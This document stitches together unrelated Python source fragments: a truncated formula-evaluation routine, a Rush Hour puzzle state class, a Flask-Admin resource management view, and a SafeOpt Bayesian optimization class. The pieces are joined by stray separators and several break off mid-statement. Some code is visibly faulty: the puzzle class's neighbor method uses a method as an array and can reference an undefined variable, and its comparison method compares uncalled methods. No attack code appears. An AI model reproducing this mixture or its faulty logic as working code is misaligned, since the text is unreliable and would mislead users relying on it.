res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i]
elif np.isnan(var_left.values[v_left][i]):
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '!=':
if var_left.values[v_left][i] != 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<':
if var_left.values[v_left][i] < 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>':
if var_left.values[v_left][i] > 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<=':
if var_left.values[v_left][i] <= 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>=':
if var_left.values[v_left][i] >= 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
else:
if operator in ['+', '-']:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i]
elif operator == '*':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = 0
elif operator == '/':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = 1
elif operator == '=':
if var_left.values[v_left][i] == 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '!=':
if var_left.values[v_left][i] != 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<':
if var_left.values[v_left][i] < 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>':
if var_left.values[v_left][i] > 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<=':
if var_left.values[v_left][i] <= 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>=':
if var_left.values[v_left][i] >= 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = np.nan
elif variable_right.type == Variable_Types.numeric:
for v_left in var_left.variables():
if operator == '+':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] + \
data.values[var_right][i]
elif operator == '-':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] - \
data.values[var_right][i]
elif operator == '*':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] * \
data.values[var_right][i]
elif operator == '/':
if data.values[var_right][i] != 0:
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] / \
data.values[var_right][i]
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] ** \
data.values[var_right][i]
elif np.isnan(var_left.values[v_left][i]) or np.isnan(data.values[var_right][i]):
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '!=':
if var_left.values[v_left][i] != data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '<':
if var_left.values[v_left][i] < data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '>':
if var_left.values[v_left][i] > data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '<=':
if var_left.values[v_left][i] <= data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '>=':
if var_left.values[v_left][i] >= data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] | |
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 23 01:22:56 2019
@author: CHaithcock
"""
import numpy as np
import svgwrite
import RHConstants
class RHState():
def __init__(self,board,red_car_end_a):
"""
Input (Option 1):
board: ndArray of dypte int and size 36
red_car_end_a: left most position of red car must
must be between 12 and 16 inclusive
Input (option 2):
board: integeger representing the hash of the board
red_car_end_a: left most position of red car must
must be between 12 and 16 inclusive
"""
#!!!!TODO - consider adding validation of board
if isinstance(board,np.ndarray):
if board.size == 36:
if board.dtype == int:
self._board = np.copy(board.reshape(6,6))
else:
raise Exception("RH Board numpy ndarray must have dtype int")
else:
raise Exception("Numpy array for board must consist of 36 elements")
elif isinstance(board,int):
self._board = self._int_to_board(board)
else:
raise TypeError('Board Must be an Integer or an ndArray')
if not (12 <= red_car_end_a <= 16):
raise ValueError("Red Car End A must be between 12 and 16 inclusive",red_car_end_a)
else:
self._red_car_end_a = red_car_end_a
self._pieces = None
self._init_svg()
self._svg_pieces = None
def __eq__(self,other):
if not isinstance(other, RHState):
return NotImplemented
if self._board_as_int()== other._board_as_int():
if self._red_car_end_a == other._red_car_end_a:
return True
return False
def __lt__(self,other):
if not isinstance(other, RHState):
return NotImplemented
if self._board_as_int < other.board_as_int:
return True
if self._board_as_int > other.board_as_int:
return False
# if _board_as_int is same in both instances,
# compoare red_car_end_a
if self._red_car_end_a < other.red_car_end_a:
return True
return False
def __hash__(self):
return hash ( (self._board_as_int(),self._red_car_end_a) )
# ####################################################
#
# Data Routines
#
# Input/Output/Data Conversion
#
#
# #####################################################
def _board_as_bitstrings(self):
vec_bin_repr = np.vectorize(lambda x: np.binary_repr(x,width=3))
t = vec_bin_repr(self._board)
return t
def _board_as_int(self):
vec_bin_repr = np.vectorize(lambda x: np.binary_repr(x,width=3))
t = vec_bin_repr(self._board)
return int(''.join(np.apply_along_axis(lambda x: ''.join(x), 1,t)),2)
def _int_to_board(self,i):
#i = '154444257952488798331863040'
s = bin(int(i))[2:].zfill(108)
v = np.array([int(s[i:i+3],2) for i in range(0,len(s),3)],dtype=int)
return v.reshape((6,6))
def board(self):
return self._board
def _red_car_cols(self):
red_car_a_col = self._red_car_end_a % 6
return ( (red_car_a_col, red_car_a_col + 1 ) )
def as_array(self):
return( (self._board,self._red_car_end_a) )
pass
def as_int(self):
return ( (self._board_as_int,self._red_car_end_a) )
pass
def get_board_as2ints(self):
#return ( (self._board_as_int,self._red_car_end_a) )
pass
def _vehicles_by_order(self):
pass
def _get_pieces(self):
if self._pieces is not None:
return self._pieces
discovered = np.array([False]*36).reshape(6,6)
self._pieces = []
for row in range(6):
for col in range(6):
if not discovered[row,col] and self._board[row,col] != RHConstants.BLANK_SPACE:
piece = {}
piece['orientation'] = self._board[row,col]
piece['end_a_row'] = row
piece['end_a_col'] = col
discovered[row,col] = True
if self._board[row,col] == RHConstants.VERTICAL_CAR:
discovered[row:row+2,col] = True
elif self._board[row,col] == RHConstants.VERTICAL_TRUCK:
discovered[row:row+3,col] = True
elif self._board[row,col] == RHConstants.HORIZONTAL_CAR:
discovered[row,col:col+2] = True
elif self._board[row,col] == RHConstants.HORIZONTAL_TRUCK:
discovered[row,col:col+3] = True
self._pieces.append(piece)
return self._pieces
def _vehicles_by_type(self):
''' Create a list of indices capturing where vertical cars are
return dict of vehicles:
vcars: [ [ [x1,y1], [x2,y2] ] , ..., [ [xn,yn] , [xn',yn'] ] ]
vtrucks: [ [ [x1,y1],[x2,y2],[x3,y3] ] ... ]
hcars:
htrucks:
Will walk through self._board and track:
current location in board
current
'''
discovered = np.array([False] * 36).reshape(6,6)
ret = {'vcars':[], 'hcars':[], 'vtrucks':[],'htrucks':[]}
# discover verticals by column major order
# !!!! TODO - create a dictionary each car/truck
# each entry in ret is a list of dictionaries
'''
each inner dict keys (svg_rect_args:
a_row
a_col
color
symbol
? change loop order to loop through columns then move to next row:
for r in range(6):
for c in range(6)
if self.board[r,c] == RHConstants.VERTICAL_CAR:
'''
for c in range(6):
for r in range(6):
if self._board[r,c] == RHConstants.VERTICAL_CAR:
if discovered[r,c] == False:
ret['vcars'].append([[r,c],[r+1,c]])
discovered[r:r+2,c] = True
if self._board[r,c] == RHConstants.VERTICAL_TRUCK:
if discovered[r,c] == False:
ret['vtrucks'].append([[r,c],[r+1,c],[r+2,c]])
discovered[r:r+3,c] = True
for r in range(6):
for c in range(6):
if self._board[r,c] == RHConstants.HORIZONTAL_CAR:
if discovered[r,c] == False:
ret['hcars'].append( [[r,c],[r,c+1]])
discovered[r,c:c+2] = True
if self._board[r,c] == RHConstants.HORIZONTAL_TRUCK:
if discovered[r,c] == False:
ret['htrucks'].append([[r,c],[r,c+1],[r,c+2]])
discovered[r,c:c+3] = True
return(ret)
# ####################################################
#
# Game PLay Routines
#
# #####################################################
def isSolnState(self):
return self._red_car_end_a == 16
#!!!!TODO - add error handling for bad inputs
def neighbor(self,end_a,direction):
nbr_board = np.copy(self.board)
# !!!! Data Validation
if direction == 'up':
nbr_board[end_a-6] = self.board[end_a]
if self.board[end_a] == RHConstants.VERTICAL_CAR:
nbr_board[end_a + 6] = RHConstants.BLANK_SPACE
else:
nbr_board[end_a+12] = RHConstants.BLANK_SPACE
elif direction == 'down':
nbr_board[end_a] = RHConstants.BLANK_SPACE
if self.board[end_a] == RHConstants.VERTICAL_CAR:
nbr_board[end_a+12] = RHConstants.VERTICAL_CAR
else:
nbr_board[end_a+18] = RHConstants.VERTICAL_CAR
elif direction == 'left':
nbr_board[end_a-1] = self.board[end_a]
if self.board[end_a] == RHConstants.HORIZONTAL_CAR:
nbr_board[end_a+1] = RHConstants.BLANK_SPACE
if self._red_car_end_a == end_a:
red_car_end_a = self.red_car_end_a - 1
else:
nbr_board[end_a+2] = RHConstants.BLANK_SPACE
elif direction == 'right':
nbr_board[end_a] = RHConstants.BLANK_SPACE
if self.board[end_a] == RHConstants.HORIZONTAL_CAR:
nbr_board[end_a+2] = RHConstants.HORIZONTAL_CAR
if self._red_car_end_a == end_a:
red_car_end_a = self.red_car_end_a + 1
else:
nbr_board[end_a + 2] = RHConstants.VERTICAL_TRUCK
return RHState(nbr_board,red_car_end_a)
def neighbors_all(self):
d = self.neighbors_down()
u = self.neighbors_up()
l = self.neighbors_left()
r = self.neighbors_right()
return d.union(u).union(l).union(r)
def neighbors_up(self):
ret = set()
mv_x = -self._board + np.roll(self._board,-1,0)
#set bottom most column to zeros. Only want matches against legit up moves
mv_x[5,:] = 0
mv_car = np.where(mv_x==RHConstants.VERTICAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.VERTICAL_TRUCK)
mv_up_car = list(zip(mv_car[0],mv_car[1]))
mv_up_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_up_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_CAR
nbr_board[x+2,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a ) )
for x,y in mv_up_truck:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_TRUCK
nbr_board[x+3,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a) )
return(ret)
def neighbors_down(self):
ret = set()
mv_x = -self._board + np.roll(self._board,1,0)
#set bottom most column to zeros. Only want matches against legit up moves
mv_x[0,:] = 0
mv_car = np.where(mv_x==RHConstants.VERTICAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.VERTICAL_TRUCK)
mv_up_car = list(zip(mv_car[0],mv_car[1]))
mv_up_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_up_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_CAR
nbr_board[x-2,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a ) )
for x,y in mv_up_truck:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_TRUCK
nbr_board[x-3,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a) )
return(ret)
def neighbors_left(self):
ret = set()
mv_x = -self._board + np.roll(self._board,-1,1)
# set right most column to all zeros to eliminate non-legit left move matches.
mv_x[:,5] = 0
#mv_x = mv_x[:,:5]
mv_car = np.where(mv_x==RHConstants.HORIZONTAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.HORIZONTAL_TRUCK)
mv_left_car = list(zip(mv_car[0],mv_car[1]))
mv_left_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_left_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.HORIZONTAL_CAR
nbr_board[x,y+2] = RHConstants.BLANK_SPACE
# Test if red car is moving left
# Note, y+1, y+2 must be a horizontal car
# so, either y+1 and y+2 are the red cols or
# neither is a a red col
# if have moved the red car, then y is on the left side of the car
# and red_car_end_a = y
if x == 2 and y+1 in self._red_car_cols():
red_car_end_a = self._red_car_end_a - 1
else:
red_car_end_a = self._red_car_end_a
ret.add( RHState(nbr_board,red_car_end_a ) )
for x,y in mv_left_truck:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.HORIZONTAL_TRUCK
nbr_board[x,y+3] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a) )
return(ret)
def neighbors_right(self):
"""
Create a list of all neighbor states to self that are reached by
moving a car or truck right.
Depends on Constants being properly spaced per notes in constants file.
Uses Numpy Roll to effectively move all pieces to the right one place
and then evaluates which results to determine wihch moves were
legitimate per Rush Hour puzzle rules.
"""
ret = set()
mv_x = -self._board + np.roll(self._board,1,1)
#set left most column to zeros. Only want matches against legit right moves
mv_x[:,0] = 0
mv_car = np.where(mv_x==RHConstants.HORIZONTAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.HORIZONTAL_TRUCK)
mv_right_car = list(zip(mv_car[0],mv_car[1]))
mv_right_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_right_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.HORIZONTAL_CAR
nbr_board[x,y-2] = RHConstants.BLANK_SPACE
# Test if red car is moving left
# Note, y+1, y+2 must be a horizontal car
# | |
"""
resourceview.py
Contains administrative views for working with resources.
"""
from datetime import date
from admin_helpers import *
from sqlalchemy import or_, not_, func
from flask import current_app, redirect, flash, request, url_for
from flask.ext.admin import BaseView, expose
from flask.ext.admin.actions import action
from flask.ext.admin.contrib.sqla import ModelView
from wtforms import DecimalField, validators
import geopy
from geopy.exc import *
from remedy.rad.models import Resource, Category
from remedy.rad.geocoder import Geocoder
class ResourceView(AdminAuthMixin, ModelView):
"""
An administrative view for working with resources.
"""
column_list = ('name', 'organization',
'address', 'url',
'source', 'last_updated')
column_default_sort = 'name'
column_searchable_list = ('name','description','organization','notes',)
column_filters = ('visible','source','npi','date_verified',)
form_excluded_columns = ('date_created', 'last_updated',
'category_text', 'reviews')
create_template = 'admin/resource_create.html'
edit_template = 'admin/resource_edit.html'
column_labels = dict(npi='NPI', url='URL')
column_descriptions = dict(npi='The National Provider Identifier (NPI) of the resource.',
hours='The hours of operation for the resource.',
source='The source of the resource\'s information.',
notes='Administrative notes for the resource, not visible to end users.',
date_verified='The date the resource was last verified by an administrator.')
def scaffold_form(self):
"""
Scaffolds the creation/editing form so that the latitude
and longitude fields are optional, but can still be set
by the Google Places API integration.
"""
form_class = super(ResourceView, self).scaffold_form()
# Override the latitude/longitude fields to be optional
form_class.latitude = DecimalField(validators=[validators.Optional()])
form_class.longitude = DecimalField(validators=[validators.Optional()])
return form_class
@action('togglevisible',
'Toggle Visibility',
'Are you sure you wish to toggle visibility for the selected resources?')
def action_togglevisible(self, ids):
"""
Attempts to toggle visibility for each of the specified resources.
Args:
ids: The list of resource IDs, indicating which resources
should have their visibility toggled.
"""
# Load all resources by the set of IDs
target_resources = self.get_query().filter(self.model.id.in_(ids)).all()
# Build a list of all the results
results = []
if len(target_resources) > 0:
for resource in target_resources:
# Build a helpful message string to use for messages.
resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
visible_status = ''
try:
if not resource.visible:
resource.visible = True
visible_status = ' as visible'
else:
resource.visible = False
visible_status = ' as not visible'
except Exception as ex:
results.append('Error changing ' + resource_str + ': ' + str(ex))
else:
results.append('Marked ' + resource_str + visible_status + '.')
# Save our changes.
self.session.commit()
else:
results.append('No resources were selected.')
# Flash the results of everything
flash("\n".join(msg for msg in results))
@action('markverified',
'Mark Verified',
'Are you sure you wish to mark the selected resources as verified?')
def action_markverified(self, ids):
"""
Attempts to mark each of the specified resources as verified
on the current date.
Args:
ids: The list of resource IDs, indicating which resources
should be marked as verified.
"""
# Load all resources by the set of IDs
target_resources = self.get_query().filter(self.model.id.in_(ids)).all()
# Build a list of all the results
results = []
if len(target_resources) > 0:
for resource in target_resources:
# Build a helpful message string to use for messages.
resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
try:
resource.date_verified = date.today()
except Exception as ex:
results.append('Error changing ' + resource_str + ': ' + str(ex))
else:
results.append('Marked ' + resource_str + ' as verified.')
# Save our changes.
self.session.commit()
else:
results.append('No resources were selected.')
# Flash the results of everything
flash("\n".join(msg for msg in results))
@action('assigncategories', 'Assign Categories')
def action_assigncategories(self, ids):
"""
Sets up a redirection action for mass-assigning categories
to the specified resources.
Args:
ids: The list of resource IDs that should be updated.
"""
return redirect(url_for('resourcecategoryassignview.index', ids=ids))
def __init__(self, session, **kwargs):
super(ResourceView, self).__init__(Resource, session, **kwargs)
class ResourceRequiringGeocodingView(ResourceView):
"""
An administrative view for working with resources that need geocoding.
"""
column_list = ('name', 'organization', 'address', 'source')
# Disable model creation/deletion
can_create = False
can_delete = False
def get_query(self):
"""
Returns the query for the model type.
Returns:
The query for the model type.
"""
query = self.session.query(self.model)
return self.prepare_geocode_query(query)
def get_count_query(self):
"""
Returns the count query for the model type.
Returns:
The count query for the model type.
"""
query = self.session.query(func.count('*')).select_from(self.model)
return self.prepare_geocode_query(query)
def prepare_geocode_query(self, query):
"""
Prepares the provided query by ensuring that
all relevant geocoding-related filters have been applied.
Args:
query: The query to update.
Returns:
The updated query.
"""
# Ensure an address is defined
query = query.filter(self.model.address != None)
query = query.filter(self.model.address != '')
# Ensure at least one geocoding field is missing
query = query.filter(or_(self.model.latitude == None,
self.model.longitude == None))
return query
@action('geocode',
'Geocode')
def action_geocode(self, ids):
"""
Attempts to geocode each of the specified resources.
Args:
ids: The list of resource IDs, indicating which resources
should be geocoded.
"""
# Load all resources by the set of IDs
target_resources = self.get_query().filter(self.model.id.in_(ids)).all()
# Build a list of all the results
results = []
if len(target_resources) > 0:
# Set up the geocoder, and then try to geocode each resource
geocoder = Geocoder(api_key=current_app.config.get('MAPS_SERVER_KEY'))
for resource in target_resources:
# Build a helpful message string to use for errors.
resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
try:
geocoder.geocode(resource)
except geopy.exc.GeopyError as gpex:
# Handle Geopy errors separately
exc_type = ''
# Attempt to infer some extra information based on the exception type
if isinstance(gpex, geopy.exc.GeocoderQuotaExceeded):
exc_type = 'quota exceeded'
elif isinstance(gpex, geopy.exc.GeocoderAuthenticationFailure):
exc_type = 'authentication failure'
elif isinstance(gpex, geopy.exc.GeocoderInsufficientPrivileges):
exc_type = 'insufficient privileges'
elif isinstance(gpex, geopy.exc.GeocoderUnavailable):
exc_type = 'server unavailable'
elif isinstance(gpex, geopy.exc.GeocoderTimedOut):
exc_type = 'timed out'
elif isinstance(gpex, geopy.exc.GeocoderQueryError):
exc_type = 'query error'
if len(exc_type) > 0:
exc_type = '(' + exc_type + ') '
results.append('Error geocoding ' + resource_str + ': ' + exc_type + str(gpex))
except Exception as ex:
results.append('Error geocoding ' + resource_str + ': ' + str(ex))
else:
results.append('Geocoded ' + resource_str + '.')
# Save our changes.
self.session.commit()
else:
results.append('No resources were selected.')
# Flash the results of everything
flash("\n".join(msg for msg in results))
@action('removeaddress',
'Remove Address',
'Are you sure you wish to remove address information from the selected resources?')
def action_remove_address(self, ids):
"""
Attempts to remove address information from each of the specified resources.
Args:
ids: The list of resource IDs, indicating which resources
should have address information stripped.
"""
# Load all resources by the set of IDs
target_resources = self.get_query().filter(self.model.id.in_(ids)).all()
# Build a list of all the results
results = []
if len(target_resources) > 0:
for resource in target_resources:
# Build a helpful message string to use for errors.
resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
try:
resource.address = None
resource.latitude = None
resource.longitude = None
resource.location = None
except Exception as ex:
results.append('Error updating ' + resource_str + ': ' + str(ex))
else:
results.append('Removed address information from ' + resource_str + '.')
# Save our changes.
self.session.commit()
else:
results.append('No resources were selected.')
# Flash the results of everything
flash("\n".join(msg for msg in results))
def __init__(self, session, **kwargs):
# Because we're invoking the ResourceView constructor,
# we don't need to pass in the ResourceModel.
super(ResourceRequiringGeocodingView, self).__init__(session, **kwargs)
class ResourceRequiringCategoriesView(ResourceView):
"""
An administrative view for working with resources that need categories.
"""
column_list = ('name', 'organization', 'address', 'source')
# Disable model creation/deletion
can_create = False
can_delete = False
def get_query(self):
"""
Returns the query for the model type.
Returns:
The query for the model type.
"""
query = self.session.query(self.model)
return self.prepare_category_query(query)
def get_count_query(self):
"""
Returns the count query for the model type.
Returns:
The count query for the model type.
"""
query = self.session.query(func.count('*')).select_from(self.model)
return self.prepare_category_query(query)
def prepare_category_query(self, query):
"""
Prepares the provided query by ensuring that
filtering out resources with categories has been applied.
Args:
query: The query to update.
Returns:
The updated query.
"""
# Ensure there are no categories defined
query = query.filter(not_(self.model.categories.any()))
return query
def __init__(self, session, **kwargs):
# Because we're invoking the ResourceView constructor,
# we don't need to pass in the ResourceModel.
super(ResourceRequiringCategoriesView, self).__init__(session, **kwargs)
class ResourceCategoryAssignView(AdminAuthMixin, BaseView):
"""
The view for mass-assigning resources to categories.
"""
# Not visible in the menu.
def is_visible(self):
return False
@expose('/', methods=['GET', 'POST'])
def index(self):
| |
stopping criterion for all the gps.
This ignores the scaling factor.
scaling: list of floats or "auto"
A list used to scale the GP uncertainties to compensate for
different input sizes. This should be set to the maximal variance of
each kernel. You should probably leave this to "auto" unless your
kernel is non-stationary.
Examples
--------
>>> from safeopt import SafeOpt
>>> from safeopt import linearly_spaced_combinations
>>> import GPy
>>> import numpy as np
Define a Gaussian process prior over the performance
>>> x = np.array([[0.]])
>>> y = np.array([[1.]])
>>> gp = GPy.models.GPRegression(x, y, noise_var=0.01**2)
>>> bounds = [[-1., 1.]]
>>> parameter_set = linearly_spaced_combinations([[-1., 1.]],
... num_samples=100)
Initialize the Bayesian optimization and get new parameters to evaluate
>>> opt = SafeOpt(gp, parameter_set, fmin=[0.])
>>> next_parameters = opt.optimize()
Add a new data point with the parameters and the performance to the GP. The
performance has normally be determined through an external function call.
>>> performance = np.array([[1.]])
>>> opt.add_new_data_point(next_parameters, performance)
"""
def __init__(self, gp, parameter_set, fmin, beta_dict, lipschitz=None,
num_contexts=0, threshold=0, scaling='auto'):
"""Initialization, see `SafeOpt`."""
# Overwrite beta init
if beta_dict["style"] == "fiedler" or beta_dict["style"] == "fiedler-lipschitz":
print("Fiedler-bounds used!")
B = beta_dict["B"]
R = beta_dict["R"]
delta = beta_dict["delta"]
lamb = beta_dict["lambda"]
beta = lambda t: B + \
R * math.sqrt(math.log(np.linalg.det(self.gp.kern.K(self.data[0], self.data[0])
+ lamb * np.identity(len(self.data[0]))))
- 2 * math.log(delta))
elif beta_dict["style"] == "chowdhury":
print("Chowdhury-bounds used!")
B = beta_dict["B"]
R = beta_dict["R"]
delta = beta_dict["delta"]
noise_variance = beta_dict["noise_variance"]
card_D = beta_dict["card_D"]
beta = lambda t: B + R * math.sqrt(
2 * (card_D * math.log(1 + (R ** -2) * t * card_D *
np.amax(np.diag(
self.gp.kern.K(parameter_set, parameter_set)))) + 1 + math.log(
1 / delta)))
elif beta_dict["style"] == "srinivas":
print("Srinivas-bounds used!")
B = beta_dict["B"]
R = beta_dict["R"]
delta = beta_dict["delta"]
noise_variance = beta_dict["noise_variance"]
card_D = beta_dict["card_D"]
beta = lambda t: math.sqrt(2 * B + 300 * card_D * math.log(1 + (R ** -2) * t * card_D *
np.amax(np.diag(self.gp.kern.K(parameter_set,
parameter_set)))) * \
math.log(t / delta) ** 3)
else:
print("No beta assigned! beta = 2 is used")
beta = 2
self.safety = beta_dict["safety"]
self.index_x0 = beta_dict["index_x0"]
self.y0 = beta_dict["y0"]
self.R = beta_dict["R"]
super(SafeOpt, self).__init__(gp,
fmin=fmin,
beta=beta,
num_contexts=num_contexts,
threshold=threshold,
scaling=scaling)
if self.num_contexts > 0:
context_shape = (parameter_set.shape[0], self.num_contexts)
self.inputs = np.hstack((parameter_set,
np.zeros(context_shape,
dtype=parameter_set.dtype)))
self.parameter_set = self.inputs[:, :-self.num_contexts]
else:
self.inputs = self.parameter_set = parameter_set
self.liptschitz = lipschitz
if self.liptschitz is not None:
if not isinstance(self.liptschitz, list):
self.liptschitz = [self.liptschitz] * len(self.gps)
self.liptschitz = np.atleast_1d(
np.asarray(self.liptschitz).squeeze())
# Value intervals
self.Q = np.empty((self.inputs.shape[0], 2 * len(self.gps)),
dtype=np.float)
# Safe set
self.S = np.zeros(self.inputs.shape[0], dtype=np.bool)
self.S_x0 = self.S.copy()
self.S_x0[self.index_x0] = 1
# Switch to use confidence intervals for safety
if lipschitz is None:
self._use_lipschitz = False
else:
self._use_lipschitz = True
# Set of expanders and maximizers
self.G = self.S.copy()
self.M = self.S.copy()
self.last_y = self.y0.flatten()
self.last_x_index = self.index_x0
@property
def use_lipschitz(self):
"""
Boolean that determines whether to use the Lipschitz constant.
By default this is set to False, which means the adapted SafeOpt
algorithm is used, that uses the GP confidence intervals directly.
If set to True, the `self.lipschitz` parameter is used to compute
the safe and expanders sets.
"""
return self._use_lipschitz
@use_lipschitz.setter
def use_lipschitz(self, value):
if value and self.liptschitz is None:
raise ValueError('Lipschitz constant not defined')
self._use_lipschitz = value
@property
def parameter_set(self):
"""Discrete parameter samples for Bayesian optimization."""
return self._parameter_set
@parameter_set.setter
def parameter_set(self, parameter_set):
self._parameter_set = parameter_set
# Plotting bounds (min, max value
self.bounds = list(zip(np.min(self._parameter_set, axis=0),
np.max(self._parameter_set, axis=0)))
self.num_samples = [len(np.unique(self._parameter_set[:, i]))
for i in range(self._parameter_set.shape[1])]
@property
def context_fixed_inputs(self):
"""Return the fixed inputs for the current context."""
n = self.gp.input_dim - 1
nc = self.num_contexts
if nc > 0:
contexts = self.inputs[0, -self.num_contexts:]
return list(zip(range(n, n - nc, -1), contexts))
@property
def context(self):
"""Return the current context variables."""
if self.num_contexts:
return self.inputs[0, -self.num_contexts:]
@context.setter
def context(self, context):
"""Set the current context and update confidence intervals.
Parameters
----------
context: ndarray
New context that should be applied to the input parameters
"""
if self.num_contexts:
if context is None:
raise ValueError('Need to provide value for context.')
self.inputs[:, -self.num_contexts:] = context
def update_confidence_intervals(self, context=None):
"""Recompute the confidence intervals form the GP.
Parameters
----------
context: ndarray
Array that contains the context used to compute the sets
"""
beta = self.beta(self.t)
# print("Current beta for updating confidence intervals: ", beta)
# Update context to current setting
self.context = context
# Iterate over all functions
for i in range(len(self.gps)):
# Evaluate acquisition function
mean, var = self.gps[i].predict_noiseless(self.inputs)
mean = mean.squeeze()
std_dev = np.sqrt(var.squeeze())
# Update confidence intervals
self.Q[:, 2 * i] = mean - beta * std_dev
self.Q[:, 2 * i + 1] = mean + beta * std_dev
def compute_safe_set(self):
"""Compute only the safe set based on the current confidence bounds."""
# Update safe set
if self.safety == "modified":
self.S[:] = np.all(self.Q[:, ::2] > self.fmin, axis=1)
if self.safety == "lipschitz":
# This implementation does only work for SafeOpt with just a performance constraint (and not additional constraints)!
next_points_arr = np.logical_not(np.logical_or(self.S, self.S_x0))
next_points_indices = np.nonzero(next_points_arr)[0]
S_extended = np.logical_or(self.S, self.S_x0)
safe_points_indices = np.nonzero(S_extended)[0]
for index in safe_points_indices:
delta_S = np.where(
self.Q[:, 0][index] - self.liptschitz[0] * np.linalg.norm(
self.inputs[index] - self.inputs[next_points_indices],
axis=1) >= self.fmin[0], 1,
0)
self.S[next_points_indices] = np.logical_or(self.S[next_points_indices], delta_S)
if self.safety == "pure-lipschitz":
# This implementation does only work with just a performance constraint (and not additional constraints)!
